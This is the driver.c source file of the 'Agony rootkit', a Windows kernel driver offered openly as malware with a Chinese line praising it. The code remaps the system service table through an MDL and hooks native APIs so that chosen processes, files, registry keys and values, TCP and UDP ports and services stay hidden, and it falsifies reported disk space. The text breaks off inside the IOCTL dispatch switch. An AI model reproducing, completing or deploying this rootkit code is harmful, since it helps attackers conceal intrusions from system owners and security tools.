driver.c

超级极品的Rootkit的代码

/*

           Agony rootkit
           
               by Intox
               
               visit:   -spiritofhack.net
                        -undergroundkonnekt.net

*/


#include <ntddk.h>
#include "process.h"
#include "file.h"
#include "reg.h"
#include "port.h"
#include "disk.h"
#include "service.h"
#include "codemsg.h"


#define MAX_HIDDEN_OBJECT 128
// device definition
#define DEVICE L"\\Device\\agony"
#define DOSDEVICE L"\\DosDevices\\agony"

typedef unsigned char BOOL;

// SSDT type
typedef struct SERVICE_DESCRIPTOR_ENTRY
{
   unsigned int *ServiceTableBase;
   unsigned int *ServiceCounterTableBase;
   unsigned int NumberOfServices;
   unsigned char *ParamTableBase;
} SERVICE_DESCRIPTOR_ENTRY,*PSERVICE_DESCRIPTOR_ENTRY;

__declspec(dllimport) SERVICE_DESCRIPTOR_ENTRY KeServiceDescriptorTable;
PMDL  g_pmdlSystemCall;
PVOID *MappedSystemCallTable;

// macros to install & uninstall hooks

#define SYSTEMSERVICE(_function)  \
      KeServiceDescriptorTable.ServiceTableBase[*(PULONG)((PUCHAR)_function+1)]

#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
#define HOOK_SYSCALL(_Function, _Hook, _Orig )  \
       _Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)

#define UNHOOK_SYSCALL(_Function, _Hook, _Orig )  \
       InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Orig)    


PDEVICE_OBJECT DriverDeviceObject = NULL; 
BOOL MDLinit = FALSE;

// hooked native APIs
extern ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformationAddress;
extern ZWQUERYDIRECTORYFILE ZwQueryDirectoryFileAddress;
extern ZWENUMERATEKEY ZwEnumerateKeyAddress;
extern ZWENUMERATEVALUEKEY ZwEnumerateValueKeyAddress;
extern ZWDEVICEIOCONTROLFILE ZwDeviceIoControlFileAddress;
extern ZWQUERYVOLUMEINFORMATIONFILE ZwQueryVolumeInformationFileAddress;

// Boolean, to know if hook are in place
BOOL ZwQuerySystemInformationHooked = FALSE;
BOOL ZwQueryDirectoryFileHooked = FALSE;
BOOL ZwEnumerateKeyHooked = FALSE;
BOOL ZwEnumerateValueKeyHooked = FALSE;
BOOL ZwDeviceIoControlFileHooked = FALSE;
BOOL ZwQueryVolumeInformationFileHooked = FALSE;

// pointer to tables of hooked objects
extern WCHAR *ProcessToHide[128];
extern WCHAR *FileToHide[128];
extern WCHAR *RegKeyToHide[128];
extern WCHAR *RegValueToHide[128];
extern USHORT TcpPortToHide[1024];
extern USHORT UdpPortToHide[1024];
extern WCHAR ServiceToHide[256];

// number of hooked objects
extern ULONG NbProcessToHide;
extern ULONG NbFileToHide;
extern ULONG NbRegKeyToHide;
extern ULONG NbRegValueToHide;
extern ULONG NbTcpPortToHide;
extern ULONG NbUdpPortToHide;

// space disk falsification
extern WCHAR HardDrives[26];
extern ULONG SpaceToHide[26];

NTSTATUS initMDL()
{  
   // map memory into our domain
   g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, 
                               KeServiceDescriptorTable.NumberOfServices*4);
   if(!g_pmdlSystemCall)
      return STATUS_UNSUCCESSFUL;

   MmBuildMdlForNonPagedPool(g_pmdlSystemCall);

   // change MDL permissions
   g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
   MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
   
   MDLinit = TRUE;

   return STATUS_SUCCESS;
}

void removeHooks()
{
   //DbgPrint("removeHooks()");   

   __asm cli  
      // replace original addresses
   if( ZwQuerySystemInformationHooked )
      UNHOOK_SYSCALL( ZwQuerySystemInformation, 
                      ZwQuerySystemInformationHook, 
                      ZwQuerySystemInformationAddress ); 
   if( ZwQueryDirectoryFileHooked )                                     
      UNHOOK_SYSCALL( ZwQueryDirectoryFile, 
                      ZwQueryDirectoryFileHook, 
                      ZwQueryDirectoryFileAddress );                 
   if( ZwEnumerateKeyHooked )
      UNHOOK_SYSCALL( ZwEnumerateKey, 
                      ZwEnumerateKeyHook, 
                      ZwEnumerateKeyAddress );
   if( ZwEnumerateValueKeyHooked )
      UNHOOK_SYSCALL( ZwEnumerateValueKey, 
                      ZwEnumerateValueKeyHook, 
                      ZwEnumerateValueKeyAddress ); 
   if( ZwDeviceIoControlFileHooked )
      UNHOOK_SYSCALL( ZwDeviceIoControlFile, 
                      ZwDeviceIoControlFileHook, 
                      ZwDeviceIoControlFileAddress ); 
   if( ZwQueryVolumeInformationFileHooked )
      UNHOOK_SYSCALL( ZwQueryVolumeInformationFile, 
                      ZwQueryVolumeInformationFileHook, 
                      ZwQueryVolumeInformationFileAddress );                               
   __asm sti                  
   
    
   
   // free the MDL
   if(g_pmdlSystemCall) {
      MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
      IoFreeMdl(g_pmdlSystemCall);
   }
   MDLinit = FALSE;
           
   return;
}

void Unload(IN PDRIVER_OBJECT DriverObject)
{
   UNICODE_STRING DosDeviceName;  
   ULONG i;
   
   //DbgPrint("Unloading driver...");
   
   removeHooks();

   // free memory
   for(i=0; i<NbProcessToHide; i++)
      ExFreePool( ProcessToHide[i] );
   for(i=0; i<NbFileToHide; i++)
      ExFreePool( FileToHide[i] );
   for(i=0; i<NbRegKeyToHide; i++)
      ExFreePool( RegKeyToHide[i] );
   for(i=0; i<NbRegValueToHide; i++)
      ExFreePool( RegValueToHide[i] );          
   
   // replace hidden services
   UnhideFromSCManager();
   
   // delete symbolic links
   RtlInitUnicodeString(&DosDeviceName, DOSDEVICE);
   IoDeleteSymbolicLink( &DosDeviceName );
   
   // delete device
   if( DriverDeviceObject != NULL )
      IoDeleteDevice( DriverDeviceObject );
}


// function to dispatch the IRPs
NTSTATUS IODispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
   Irp->IoStatus.Status = STATUS_SUCCESS;
   IoCompleteRequest(Irp,IO_NO_INCREMENT);
   return STATUS_SUCCESS;
}


void AddObjectToHide( WCHAR **Tab, PULONG Nb, WCHAR *Object, PNTSTATUS status )
{
   ULONG i;  
   SIZE_T size = (wcslen(Object)+1)*sizeof(WCHAR);  
   
   // verify that this object isn't already hidden
   for(i=0; i<*Nb; i++) {
      if( size == (wcslen(Tab[i])+1)*sizeof(WCHAR) && !memcmp(Object, Tab[i], size) )  
         return;         
   }         
   
   if( *Nb < MAX_HIDDEN_OBJECT ) {
      Tab[ *Nb ] = (WCHAR*)ExAllocatePool(PagedPool, size );
      
      if( !Tab[*Nb] ) 
         // MSDN says:
         // If ExAllocatePool returns NULL, the caller should return the NTSTATUS 
         // value STATUS_INSUFFICIENT_RESOURCES or should delay processing to 
         // another point in time.    
         *status = STATUS_INSUFFICIENT_RESOURCES;    
      else { 
         memcpy( Tab[*Nb], Object, size); 
         (*Nb)++;
      }   
   }       
}

// routine qui lancera les hooks
NTSTATUS IOManager(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{     
   PIO_STACK_LOCATION StackLocation = IoGetCurrentIrpStackLocation(Irp);
   ULONG IRPcode = StackLocation->Parameters.DeviceIoControl.IoControlCode;    
   WCHAR *buf;
   SIZE_T size;
   ULONG i;
   PUSHORT port;
   BOOL hidden = FALSE;
   
   buf = (WCHAR*)Irp->AssociatedIrp.SystemBuffer;
   
   Irp->IoStatus.Status = STATUS_SUCCESS; 
     
   switch( IRPcode ) {

      case CODEMSG(NO_MSG):